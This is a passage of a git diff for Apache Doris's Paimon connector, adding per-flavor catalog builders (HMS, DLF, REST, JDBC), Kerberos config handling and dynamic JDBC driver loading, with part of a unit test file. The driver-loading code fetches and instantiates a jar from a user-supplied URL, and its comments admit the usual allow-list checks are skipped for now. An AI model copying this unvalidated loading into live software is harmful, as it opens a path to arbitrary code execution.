Builds the {@link HiveConf} for the {@code hms} flavor, reconstructed from the raw property + * map. Replaces fe-core {@code HMSBaseProperties.getHiveConf()} minimally: sets all {@code hive.*} + * keys verbatim, the metastore uri, the present auth keys, the kerberos-conditional metastore + * SASL/service-principal/auth_to_local keys, the metastore client socket timeout default, then + * overlays the storage config. + * + *

NOTE (B1, post-fix I-2): the kerberos-conditional metastore keys legacy + * {@code HMSBaseProperties.initHadoopAuthenticator}/{@code checkAndInit} sets ARE now handled + * here — {@code hive.metastore.sasl.enabled=true} + {@code hadoop.security.authentication=kerberos} + * (when the auth type is kerberos), the metastore SERVICE principal + * {@code hive.metastore.kerberos.principal} (sourced from {@code hive.metastore.service.principal} + * or {@code hive.metastore.kerberos.principal}), and {@code hadoop.security.auth_to_local}. + * What remains DEFERRED is loading an external hive-site.xml FILE ({@code hive.conf.resources}) — + * legacy resolved it through fe-core {@code CatalogConfigFileUtils}, which the connector cannot + * import. The real Kerberos UGI {@code doAs} is injected by the FE via + * {@code ConnectorContext.executeAuthenticated}; here we only carry the auth keys into the conf + * (legacy additionally built a {@code HadoopAuthenticator} from them). + * + *

PURE: depends only on {@code props}. + */ + public static HiveConf buildHmsHiveConf(Map props) { + HiveConf hiveConf = new HiveConf(); + // All user-supplied hive.* keys verbatim (legacy initUserHiveConfig). + props.forEach((k, v) -> { + if (k.startsWith("hive.")) { + hiveConf.set(k, v); + } + }); + // Metastore uri (legacy checkAndInit: hiveConf.set("hive.metastore.uris", uri)). + String uri = firstNonBlank(props, PaimonConnectorProperties.HMS_URI); + if (StringUtils.isNotBlank(uri)) { + hiveConf.set("hive.metastore.uris", uri); + } + // Auth keys present in props (legacy HMSBaseProperties @ConnectorProperty fields). The real + // UGI.doAs() is applied by ConnectorContext.executeAuthenticated; these keys just describe it. + copyIfPresent(props, hiveConf, "hive.metastore.authentication.type"); + copyIfPresent(props, hiveConf, "hive.metastore.client.principal"); + copyIfPresent(props, hiveConf, "hive.metastore.client.keytab"); + copyIfPresent(props, hiveConf, "hadoop.security.authentication"); + copyIfPresent(props, hiveConf, "hadoop.kerberos.principal"); + copyIfPresent(props, hiveConf, "hadoop.kerberos.keytab"); + copyIfPresent(props, hiveConf, "hadoop.username"); + + // Kerberos-conditional metastore keys, ported faithfully from + // HMSBaseProperties.initHadoopAuthenticator (lines 152-185): + // - the SERVICE principal hive.metastore.kerberos.principal is set UNCONDITIONALLY when a + // service principal is supplied (legacy field hiveMetastoreServicePrincipal, sourced from + // "hive.metastore.service.principal" OR "hive.metastore.kerberos.principal"); not gated on + // the auth type (legacy lines 153-155). + String servicePrincipal = firstNonBlank(props, + "hive.metastore.service.principal", "hive.metastore.kerberos.principal"); + if (StringUtils.isNotBlank(servicePrincipal)) { + hiveConf.set("hive.metastore.kerberos.principal", servicePrincipal); + } + // - hadoop.security.auth_to_local is set UNCONDITIONALLY when present (legacy lines 156-159). + copyIfPresent(props, hiveConf, "hadoop.security.auth_to_local"); + // - sasl.enabled + hadoop.security.authentication=kerberos are set when the HMS auth type is + // kerberos (legacy lines 160-167), OR — when the HMS auth type is NOT simple — when the + // HDFS auth type (hadoop.security.authentication) is kerberos (legacy fallback lines + // 174-182). Matches legacy's branching exactly. + String hmsAuthType = props.getOrDefault("hive.metastore.authentication.type", "none"); + String hdfsAuthType = props.get("hadoop.security.authentication"); + boolean hmsKerberos = "kerberos".equalsIgnoreCase(hmsAuthType); + boolean hdfsFallbackKerberos = !"simple".equalsIgnoreCase(hmsAuthType) + && !hmsKerberos + && "kerberos".equalsIgnoreCase(hdfsAuthType); + if (hmsKerberos || hdfsFallbackKerberos) { + hiveConf.set("hadoop.security.authentication", "kerberos"); + hiveConf.set("hive.metastore.sasl.enabled", "true"); + } + + // Metastore client socket timeout default (legacy checkAndInit lines 204-208): when the user + // did not override it, default to Config.hive_metastore_client_timeout_second (=10s). The + // ConfVar key string is "hive.metastore.client.socket.timeout"; legacy expresses the value in + // seconds via HiveConf.setVar(..., METASTORE_CLIENT_SOCKET_TIMEOUT, "10"). + if (StringUtils.isBlank(props.get("hive.metastore.client.socket.timeout"))) { + hiveConf.set("hive.metastore.client.socket.timeout", "10"); + } + + // Overlay the storage config (legacy buildHiveConfiguration + appendUserHadoopConfig). + applyStorageConfig(props, hiveConf::set); + return hiveConf; + } + + /** + * Builds the {@link HiveConf} for the {@code dlf} flavor (Aliyun DLF adapted onto paimon's + * "hive" metastore via the ProxyMetaStoreClient). Replaces fe-core + * {@code PaimonAliyunDLFMetaStoreProperties.buildHiveConf()} + {@code AliyunDLFBaseProperties + * .checkAndInit()} minimally. + * + *

reference: com.aliyun.datalake.metastore.common.DataLakeConfig.CATALOG_* (values verified + * via javap) — the 8 keys set below are the literal values of those constants: + *

+     *   CATALOG_ACCESS_KEY_ID     = "dlf.catalog.accessKeyId"
+     *   CATALOG_ACCESS_KEY_SECRET = "dlf.catalog.accessKeySecret"
+     *   CATALOG_ENDPOINT          = "dlf.catalog.endpoint"
+     *   CATALOG_REGION_ID         = "dlf.catalog.region"
+     *   CATALOG_SECURITY_TOKEN    = "dlf.catalog.securityToken"
+     *   CATALOG_USER_ID           = "dlf.catalog.uid"
+     *   CATALOG_ID                = "dlf.catalog.id"
+     *   CATALOG_PROXY_MODE        = "dlf.catalog.proxyMode"
+     * 
+ * + *

PURE: depends only on {@code props}. + */ + public static HiveConf buildDlfHiveConf(Map props) { + String accessKey = firstNonBlank(props, PaimonConnectorProperties.DLF_ACCESS_KEY); + String secretKey = firstNonBlank(props, PaimonConnectorProperties.DLF_SECRET_KEY); + String sessionToken = firstNonBlank(props, PaimonConnectorProperties.DLF_SESSION_TOKEN); + String region = props.get(PaimonConnectorProperties.DLF_REGION); + String endpoint = firstNonBlank(props, PaimonConnectorProperties.DLF_ENDPOINT); + String uid = firstNonBlank(props, PaimonConnectorProperties.DLF_UID); + String catalogId = firstNonBlank(props, PaimonConnectorProperties.DLF_CATALOG_ID); + String accessPublic = props.getOrDefault( + PaimonConnectorProperties.DLF_ACCESS_PUBLIC[0], + props.getOrDefault(PaimonConnectorProperties.DLF_ACCESS_PUBLIC[1], + PaimonConnectorProperties.DLF_ACCESS_PUBLIC_DEFAULT)); + String proxyMode = props.getOrDefault( + PaimonConnectorProperties.DLF_PROXY_MODE[0], + props.getOrDefault(PaimonConnectorProperties.DLF_PROXY_MODE[1], + PaimonConnectorProperties.DLF_PROXY_MODE_DEFAULT)); + + // Endpoint/catalog-id normalization (legacy AliyunDLFBaseProperties.checkAndInit). + if (StringUtils.isBlank(endpoint) && StringUtils.isNotBlank(region)) { + endpoint = BooleanUtils.toBoolean(accessPublic) + ? "dlf." + region + ".aliyuncs.com" + : "dlf-vpc." + region + ".aliyuncs.com"; + } + if (StringUtils.isBlank(endpoint)) { + throw new IllegalStateException("dlf.endpoint is required."); + } + if (StringUtils.isBlank(catalogId)) { + catalogId = uid; + } + + HiveConf hiveConf = new HiveConf(); + hiveConf.set("dlf.catalog.accessKeyId", nullToEmpty(accessKey)); + hiveConf.set("dlf.catalog.accessKeySecret", nullToEmpty(secretKey)); + hiveConf.set("dlf.catalog.endpoint", endpoint); + hiveConf.set("dlf.catalog.region", nullToEmpty(region)); + hiveConf.set("dlf.catalog.securityToken", nullToEmpty(sessionToken)); + hiveConf.set("dlf.catalog.uid", nullToEmpty(uid)); + hiveConf.set("dlf.catalog.id", nullToEmpty(catalogId)); + hiveConf.set("dlf.catalog.proxyMode", proxyMode); + // Overlay the OSS storage config (legacy ossProps.getHadoopStorageConfig + appendUserHadoopConfig). + applyStorageConfig(props, hiveConf::set); + return hiveConf; + } + + /** + * Fails fast unless an OSS / OSS_HDFS object-store storage key is present, mirroring legacy + * {@code PaimonAliyunDLFMetaStoreProperties.initializeCatalog}, which selected a + * {@code StorageProperties} of {@code Type.OSS || Type.OSS_HDFS} (NOT a generic S3 backend) and + * otherwise threw {@code "Paimon DLF metastore requires OSS storage properties."}. We cannot + * import the fe-core {@code StorageProperties} enum, so we key off the OSS-only storage property + * prefixes the user passes for a DLF catalog ({@code oss.} / {@code fs.oss.} / {@code paimon.fs.oss.}). + * A misconfigured S3-only DLF catalog (only {@code s3.*}/{@code fs.s3a.*}/{@code paimon.s3.*} keys) + * is therefore rejected, matching legacy. + * + *

PURE: depends only on {@code props}. Throws {@link IllegalStateException} with the exact + * legacy message. + */ + public static void requireOssStorageForDlf(Map props) { + for (String key : props.keySet()) { + if (key.startsWith("oss.") || key.startsWith("fs.oss.") || key.startsWith("paimon.fs.oss.")) { + return; + } + } + throw new IllegalStateException("Paimon DLF metastore requires OSS storage properties."); + } + + private static void copyIfPresent(Map props, HiveConf hiveConf, String key) { + String value = props.get(key); + if (StringUtils.isNotBlank(value)) { + hiveConf.set(key, value); + } + } + + private static String nullToEmpty(String s) { + return s == null ? "" : s; + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index e9076b9c6938dc..4165469cb7bcbe 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -21,7 +21,11 @@ import org.apache.doris.connector.api.ConnectorMetadata; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; +import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.commons.lang3.StringUtils; +import org.apache.hadoop.conf.Configuration; +import org.apache.hadoop.hive.conf.HiveConf; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.apache.paimon.catalog.Catalog; @@ -30,7 +34,12 @@ import org.apache.paimon.options.Options; import java.io.IOException; +import java.net.MalformedURLException; +import java.net.URL; +import java.net.URLClassLoader; import java.util.Map; +import java.util.Set; +import java.util.concurrent.ConcurrentHashMap; /** * Paimon connector implementation managing the lifecycle of a @@ -38,17 +47,37 @@ * *

The Paimon Catalog is lazily created on first metadata access. * It supports multiple catalog backends (filesystem, HMS, DLF, REST, JDBC) - * determined by the {@code paimon.catalog.type} property. + * determined by the {@code paimon.catalog.type} property. The per-flavor option + * assembly lives in the pure {@link PaimonCatalogFactory}; this class drives the + * live catalog creation. + * + *

B1 lands all five flavors live. filesystem/jdbc create a {@link CatalogContext} carrying a + * minimal Hadoop {@link Configuration} (HDFS/S3 storage), rest is Options-only, and hms/dlf carry a + * {@link HiveConf} (metastore=hive). All create calls are wrapped in + * {@code ConnectorContext.executeAuthenticated} so the FE-injected Kerberos UGI (if any) applies; + * the default is a no-op. The {@code Configuration}/{@code HiveConf} are assembled by the pure + * builders in {@link PaimonCatalogFactory}. */ public class PaimonConnector implements Connector { private static final Logger LOG = LogManager.getLogger(PaimonConnector.class); + /** + * Caches {@link ClassLoader}s keyed by resolved driver URL so a given JDBC driver jar is + * loaded at most once across catalogs, and tracks the (url#class) keys already registered with + * the {@link java.sql.DriverManager}. Ported verbatim from the legacy + * {@code PaimonJdbcMetaStoreProperties}. + */ + private static final Map DRIVER_CLASS_LOADER_CACHE = new ConcurrentHashMap<>(); + private static final Set REGISTERED_DRIVER_KEYS = ConcurrentHashMap.newKeySet(); + private final Map properties; + private final ConnectorContext context; private volatile Catalog catalog; - public PaimonConnector(Map properties) { + public PaimonConnector(Map properties, ConnectorContext context) { this.properties = properties; + this.context = context; } @Override @@ -74,12 +103,205 @@ private Catalog ensureCatalog() { } private Catalog createCatalog() { - Options options = Options.fromMap(properties); - CatalogContext context = CatalogContext.create(options); + Options options = PaimonCatalogFactory.buildCatalogOptions(properties); + String flavor = PaimonCatalogFactory.resolveFlavor(properties); + + switch (flavor) { + case PaimonConnectorProperties.FILESYSTEM: { + // filesystem carries a Hadoop Configuration for HDFS/S3 storage. + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(properties); + return createCatalogFromContext(CatalogContext.create(options, conf), flavor, + "Failed to create Paimon catalog with filesystem metastore"); + } + case PaimonConnectorProperties.REST: { + // rest is Options-only (no storage Configuration; the REST server owns storage). + return createCatalogFromContext(CatalogContext.create(options), flavor, + "Failed to create Paimon catalog with REST metastore"); + } + case PaimonConnectorProperties.JDBC: { + maybeRegisterJdbcDriver(); + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(properties); + return createCatalogFromContext(CatalogContext.create(options, conf), flavor, + "Failed to create Paimon catalog with JDBC metastore"); + } + case PaimonConnectorProperties.HMS: { + // NOTE (B1/cutover-blocker P5-B7): the live metastore=hive path needs the Thrift + // metastore client (org.apache.hadoop.hive.metastore.IMetaStoreClient / + // HiveMetaStoreClient), which is NOT provided by this connector's compile deps + // (paimon-hive-connector-3.1 keeps hive-exec/hive-metastore/hadoop-client at test + // scope; hive-common only carries HiveConf). At cutover it must resolve from the FE + // host's hive-catalog-shade. There is also a cross-classloader identity hazard: the + // plugin loads child-first, so the bundled hadoop-common/hive-common Configuration/ + // HiveConf can diverge from the host shade's. Live-e2e MUST verify, before cutover, + // that a real HMS-backed metastore=hive paimon catalog created through the plugin + // throws neither NoClassDefFoundError (.../IMetaStoreClient) nor a Configuration/ + // HiveConf LinkageError/ClassCastException. + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties); + return createCatalogFromContext(CatalogContext.create(options, hc), flavor, + "Failed to create Paimon catalog with HMS metastore"); + } + case PaimonConnectorProperties.DLF: { + // Legacy parity: DLF metastore requires an OSS / OSS_HDFS backend specifically (not a + // generic S3 one). Enforced at catalog build, before the HiveConf is assembled, + // matching legacy PaimonAliyunDLFMetaStoreProperties.initializeCatalog timing. + PaimonCatalogFactory.requireOssStorageForDlf(properties); + // NOTE (B1/cutover-blocker P5-B7): same metastore=hive runtime gap as the hms branch + // above — the Thrift metastore client (IMetaStoreClient/HiveMetaStoreClient, here the + // Aliyun ProxyMetaStoreClient) is host-provided via hive-catalog-shade at cutover, not + // bundled; and the child-first Configuration/HiveConf cross-loader identity hazard + // applies. Live-e2e MUST verify, before cutover, that a real DLF-backed + // metastore=hive paimon catalog created through the plugin throws neither + // NoClassDefFoundError (.../IMetaStoreClient) nor a Configuration/HiveConf + // LinkageError/ClassCastException. + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(properties); + return createCatalogFromContext(CatalogContext.create(options, hc), flavor, + "Failed to create Paimon catalog with DLF metastore"); + } + default: + throw new IllegalArgumentException("Unknown paimon.catalog.type value: " + flavor); + } + } + + private Catalog createCatalogFromContext(CatalogContext catalogContext, String flavor, String failureMessage) { try { - return CatalogFactory.createCatalog(context); + return context.executeAuthenticated(() -> CatalogFactory.createCatalog(catalogContext)); } catch (Exception e) { - throw new RuntimeException("Failed to create Paimon catalog: " + e.getMessage(), e); + throw new RuntimeException(failureMessage + " (flavor=" + flavor + "): " + e.getMessage(), e); + } + } + + /** + * If a JDBC driver_url is configured, dynamically load + register the driver before creating + * the catalog. {@link java.sql.DriverManager#getConnection} does not consult the thread context + * class loader, so the driver must be registered globally. Ported from the legacy + * {@code PaimonJdbcMetaStoreProperties.registerJdbcDriver}, with the fe-core + * {@code JdbcResource.getFullDriverUrl} dependency replaced by connector-side resolution + * against {@code ConnectorContext.getEnvironment()}. + */ + private void maybeRegisterJdbcDriver() { + String driverUrl = PaimonCatalogFactory.firstNonBlank( + properties, PaimonConnectorProperties.JDBC_DRIVER_URL); + if (StringUtils.isBlank(driverUrl)) { + return; + } + String driverClass = PaimonCatalogFactory.firstNonBlank( + properties, PaimonConnectorProperties.JDBC_DRIVER_CLASS); + registerJdbcDriver(driverUrl, driverClass); + LOG.info("Using dynamic JDBC driver for Paimon JDBC catalog from: {}", driverUrl); + } + + /** + * Resolves a driver_url to a full URL string. If it is already a URL (contains {@code "://"}) + * it is used as-is; an absolute path (starting with {@code "/"}) is returned unchanged; + * otherwise it is treated as a bare jar file name and resolved against the engine's configured + * {@code jdbc_drivers_dir} (defaulting to {@code $DORIS_HOME/plugins/jdbc_drivers}), mirroring + * the minimal {@code JdbcResource.getFullDriverUrl} behavior. + * + *

NOTE (B1/cutover-blocker): legacy JdbcResource.getFullDriverUrl enforced FE security + * allow-lists (jdbc_driver_url_white_list, jdbc_driver_secure_path) + jar-name format + * validation. Those gates are NOT enforced here (the connector cannot import fe-core). + * Before the jdbc driver_url path goes live at cutover (P5-B7), driver-url validation + * must be routed through a ConnectorContext hook (cf. sanitizeJdbcUrl). Until then, + * paimon is not in SPI_READY_TYPES so this path is not user-reachable. + */ + private String resolveFullDriverUrl(String driverUrl) { + if (driverUrl.contains("://")) { + return driverUrl; + } + if (driverUrl.startsWith("/")) { + // Absolute path, no scheme: legacy returns it as-is (no driversDir prepend). + return driverUrl; + } + Map env = context.getEnvironment(); + String driversDir = env.get("jdbc_drivers_dir"); + if (StringUtils.isBlank(driversDir)) { + String dorisHome = env.getOrDefault("doris_home", "."); + driversDir = dorisHome + "/plugins/jdbc_drivers"; + } + return "file://" + driversDir + "/" + driverUrl; + } + + private void registerJdbcDriver(String driverUrl, String driverClassName) { + try { + if (StringUtils.isBlank(driverClassName)) { + throw new IllegalArgumentException( + "jdbc.driver_class or paimon.jdbc.driver_class is required when jdbc.driver_url " + + "or paimon.jdbc.driver_url is specified"); + } + + String fullDriverUrl = resolveFullDriverUrl(driverUrl); + URL url = new URL(fullDriverUrl); + String driverKey = fullDriverUrl + "#" + driverClassName; + if (!REGISTERED_DRIVER_KEYS.add(driverKey)) { + LOG.info("JDBC driver already registered for Paimon catalog: {} from {}", + driverClassName, fullDriverUrl); + return; + } + try { + ClassLoader classLoader = DRIVER_CLASS_LOADER_CACHE.computeIfAbsent(url, u -> { + ClassLoader parent = getClass().getClassLoader(); + return URLClassLoader.newInstance(new URL[] {u}, parent); + }); + Class loadedDriverClass = Class.forName(driverClassName, true, classLoader); + java.sql.Driver driver = (java.sql.Driver) loadedDriverClass.getDeclaredConstructor().newInstance(); + java.sql.DriverManager.registerDriver(new DriverShim(driver)); + LOG.info("Successfully registered JDBC driver for Paimon catalog: {} from {}", + driverClassName, fullDriverUrl); + } catch (ClassNotFoundException e) { + REGISTERED_DRIVER_KEYS.remove(driverKey); + throw new IllegalArgumentException("Failed to load JDBC driver class: " + driverClassName, e); + } catch (Exception e) { + REGISTERED_DRIVER_KEYS.remove(driverKey); + throw new RuntimeException("Failed to register JDBC driver: " + driverClassName, e); + } + } catch (MalformedURLException e) { + throw new IllegalArgumentException("Invalid driver URL: " + driverUrl, e); + } catch (IllegalArgumentException e) { + throw e; + } + } + + private static class DriverShim implements java.sql.Driver { + private final java.sql.Driver delegate; + + DriverShim(java.sql.Driver delegate) { + this.delegate = delegate; + } + + @Override + public java.sql.Connection connect(String url, java.util.Properties info) throws java.sql.SQLException { + return delegate.connect(url, info); + } + + @Override + public boolean acceptsURL(String url) throws java.sql.SQLException { + return delegate.acceptsURL(url); + } + + @Override + public java.sql.DriverPropertyInfo[] getPropertyInfo(String url, java.util.Properties info) + throws java.sql.SQLException { + return delegate.getPropertyInfo(url, info); + } + + @Override + public int getMajorVersion() { + return delegate.getMajorVersion(); + } + + @Override + public int getMinorVersion() { + return delegate.getMinorVersion(); + } + + @Override + public boolean jdbcCompliant() { + return delegate.jdbcCompliant(); + } + + @Override + public java.util.logging.Logger getParentLogger() throws java.sql.SQLFeatureNotSupportedException { + return delegate.getParentLogger(); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java index 8457f5200e06df..dffbb5148dabed 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java @@ -19,6 +19,13 @@ /** * Property key constants for Paimon connector configuration. + * + *

Pure static-constant holder (no logic), mirroring the role of + * {@code MCConnectorProperties}. Where a Doris-facing property accepts multiple + * aliases (matching the legacy fe-core {@code @ConnectorProperty(names = {...})} + * declarations), the aliases are exposed as a {@code String[]} in alias-priority + * order so {@link PaimonCatalogFactory} can resolve them with + * {@code firstNonBlank}. */ public final class PaimonConnectorProperties { @@ -37,6 +44,48 @@ public final class PaimonConnectorProperties { /** Default catalog type when not specified. */ public static final String DEFAULT_CATALOG_TYPE = "filesystem"; + // ---- Flavor literals (the accepted paimon.catalog.type values) ---- + public static final String FILESYSTEM = "filesystem"; + public static final String HMS = "hms"; + public static final String REST = "rest"; + public static final String JDBC = "jdbc"; + public static final String DLF = "dlf"; + + // ---- HMS flavor keys ---- + /** Hive metastore uri; primary key + the {@code "uri"} alias (legacy HMSBaseProperties). */ + public static final String[] HMS_URI = {"hive.metastore.uris", "uri"}; + public static final String CLIENT_POOL_CACHE_EVICTION_INTERVAL_MS = "client-pool-cache.eviction-interval-ms"; + /** Default client-pool-cache eviction interval (ms) = 5 minutes (legacy default). */ + public static final String CLIENT_POOL_CACHE_EVICTION_INTERVAL_MS_DEFAULT = "300000"; + public static final String LOCATION_IN_PROPERTIES = "location-in-properties"; + public static final String LOCATION_IN_PROPERTIES_DEFAULT = "false"; + + // ---- REST flavor keys ---- + public static final String[] REST_URI = {"paimon.rest.uri", "uri"}; + public static final String REST_TOKEN_PROVIDER = "paimon.rest.token.provider"; + public static final String REST_DLF_ACCESS_KEY_ID = "paimon.rest.dlf.access-key-id"; + public static final String REST_DLF_ACCESS_KEY_SECRET = "paimon.rest.dlf.access-key-secret"; + + // ---- JDBC flavor keys ---- + public static final String[] JDBC_URI = {"uri", "paimon.jdbc.uri"}; + public static final String[] JDBC_USER = {"paimon.jdbc.user", "jdbc.user"}; + public static final String[] JDBC_PASSWORD = {"paimon.jdbc.password", "jdbc.password"}; + public static final String[] JDBC_DRIVER_URL = {"paimon.jdbc.driver_url", "jdbc.driver_url"}; + public static final String[] JDBC_DRIVER_CLASS = {"paimon.jdbc.driver_class", "jdbc.driver_class"}; + + // ---- DLF flavor keys (legacy AliyunDLFBaseProperties) ---- + public static final String[] DLF_ACCESS_KEY = {"dlf.access_key", "dlf.catalog.accessKeyId"}; + public static final String[] DLF_SECRET_KEY = {"dlf.secret_key", "dlf.catalog.accessKeySecret"}; + public static final String[] DLF_SESSION_TOKEN = {"dlf.session_token", "dlf.catalog.sessionToken"}; + public static final String DLF_REGION = "dlf.region"; + public static final String[] DLF_ENDPOINT = {"dlf.endpoint", "dlf.catalog.endpoint"}; + public static final String[] DLF_UID = {"dlf.catalog.uid", "dlf.uid"}; + public static final String[] DLF_CATALOG_ID = {"dlf.catalog.id", "dlf.catalog_id"}; + public static final String[] DLF_ACCESS_PUBLIC = {"dlf.access.public", "dlf.catalog.accessPublic"}; + public static final String DLF_ACCESS_PUBLIC_DEFAULT = "false"; + public static final String[] DLF_PROXY_MODE = {"dlf.catalog.proxyMode", "dlf.proxy.mode"}; + public static final String DLF_PROXY_MODE_DEFAULT = "DLF_ONLY"; + private PaimonConnectorProperties() { } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java index 10a96da38d5434..bd9c89c65c3092 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java @@ -38,6 +38,17 @@ public String getType() { @Override public Connector create(Map properties, ConnectorContext context) { - return new PaimonConnector(properties); + return new PaimonConnector(properties, context); + } + + /** + * Validates catalog properties at CREATE CATALOG time via the pure flavor-assembly core, + * mirroring the legacy fe-core per-flavor {@code initNormalizeAndCheckProps}/ + * {@code checkRequiredProperties} rules. Throws {@link IllegalArgumentException}, which the + * caller ({@code PluginDrivenExternalCatalog.checkProperties}) wraps into a DdlException. + */ + @Override + public void validateProperties(Map properties) { + PaimonCatalogFactory.validate(properties); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java new file mode 100644 index 00000000000000..2748cb4539275d --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -0,0 +1,566 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.hadoop.conf.Configuration; +import org.apache.hadoop.hive.conf.HiveConf; +import org.apache.paimon.options.Options; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Unit tests for {@link PaimonCatalogFactory}, the pure flavor-assembly core. + * + *

These tests are entirely offline: {@code buildCatalogOptions} is a pure transform + * (Map in, Paimon {@link Options} out) and {@code validate} is fail-fast pre-flight, so no + * live catalog, hadoop config, or env is touched. No Mockito — props are plain maps. + * + *

This is the parity baseline for B1: the per-flavor option keys MUST mirror the legacy + * fe-core {@code AbstractPaimonProperties} + each {@code Paimon*MetaStoreProperties}. + */ +public class PaimonCatalogFactoryTest { + + private static Map props(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + // --------------------------------------------------------------------- + // buildCatalogOptions — per-flavor metastore identifier + warehouse + // --------------------------------------------------------------------- + + @Test + public void filesystemSetsMetastoreFilesystemAndWarehouse() { + Options opts = PaimonCatalogFactory.buildCatalogOptions( + props("paimon.catalog.type", "filesystem", "warehouse", "/wh")); + + // WHY: filesystem is the default flavor; its metastore identifier selects + // FileSystemCatalogFactory and the warehouse is the on-disk root. Both are load-bearing + // for catalog creation. MUTATION: emitting "hive"/"jdbc" or dropping warehouse -> red. + Assertions.assertEquals("filesystem", opts.get("metastore")); + Assertions.assertEquals("/wh", opts.get("warehouse")); + } + + @Test + public void hmsSetsHiveMetastoreUriPoolAndLocation() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "hms", + "warehouse", "/wh", + "hive.metastore.uris", "thrift://nn:9083")); + + // WHY: hms maps to paimon's "hive" metastore; the legacy HMS flavor always emits the + // metastore uri plus the pool-eviction + location-in-properties defaults. Dropping any + // would change how the (B1-d2) HiveCatalog connects/caches. MUTATION: metastore!="hive", + // missing uri, or wrong defaults -> red. + Assertions.assertEquals("hive", opts.get("metastore")); + Assertions.assertEquals("thrift://nn:9083", opts.get("uri")); + Assertions.assertEquals("300000", opts.get("client-pool-cache.eviction-interval-ms")); + Assertions.assertEquals("false", opts.get("location-in-properties")); + } + + @Test + public void hmsAcceptsUriAliasAndOverrides() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "hms", + "warehouse", "/wh", + "uri", "thrift://alias:9083", + "client-pool-cache.eviction-interval-ms", "60000", + "location-in-properties", "true")); + + // WHY: the legacy HMS flavor accepts the bare "uri" alias for the metastore URI and lets + // the user override the pool/location defaults. MUTATION: ignoring the alias or hardcoding + // the defaults instead of reading the user value -> red. + Assertions.assertEquals("thrift://alias:9083", opts.get("uri")); + Assertions.assertEquals("60000", opts.get("client-pool-cache.eviction-interval-ms")); + Assertions.assertEquals("true", opts.get("location-in-properties")); + } + + @Test + public void restSetsMetastoreRestUriAndStripsRestPrefix() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "rest", + "paimon.rest.uri", "http://rest:8080", + "paimon.rest.token.provider", "bear")); + + // WHY: rest maps to the "rest" metastore; the legacy rest flavor sets "uri" from + // paimon.rest.uri and re-keys every paimon.rest.* prop by stripping the prefix (so + // token.provider becomes a paimon option). MUTATION: metastore!="rest", missing uri, or + // not stripping the paimon.rest. prefix -> red. + Assertions.assertEquals("rest", opts.get("metastore")); + Assertions.assertEquals("http://rest:8080", opts.get("uri")); + Assertions.assertEquals("bear", opts.get("token.provider")); + } + + @Test + public void jdbcSetsMetastoreUriUserAndRawJdbcKeys() { + Options opts = PaimonCatalogFactory.buildCatalogOptions(props( + "paimon.catalog.type", "jdbc", + "warehouse", "/wh", + "uri", "jdbc:mysql://db:3306/meta", + "paimon.jdbc.user", "alice", + "jdbc.password", "secret", + "jdbc.foo", "bar")); + + // WHY: jdbc maps to JdbcCatalogFactory; the legacy jdbc flavor sets the CatalogOptions URI, + // the jdbc.user/jdbc.password (read from either alias), and passes through any raw jdbc.* + // key. These are exactly the options the JdbcCatalog reads. MUTATION: metastore!="jdbc", + // missing uri/user/password, or dropping the raw jdbc.foo passthrough -> red. + Assertions.assertEquals("jdbc", opts.get("metastore")); + Assertions.assertEquals("jdbc:mysql://db:3306/meta", opts.get("uri")); + Assertions.assertEquals("alice", opts.get("jdbc.user")); + Assertions.assertEquals("secret", opts.get("jdbc.password")); + Assertions.assertEquals("bar", opts.get("jdbc.foo")); + } + + @Test + public void 